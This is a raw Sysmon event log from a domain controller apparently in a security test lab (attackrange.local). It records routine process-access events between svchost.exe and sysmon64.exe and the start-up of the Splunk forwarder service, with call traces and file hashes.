09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.078{5EBD8912-8CBD-6151-0A00-00000000FD01}624684C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.423{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.047{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 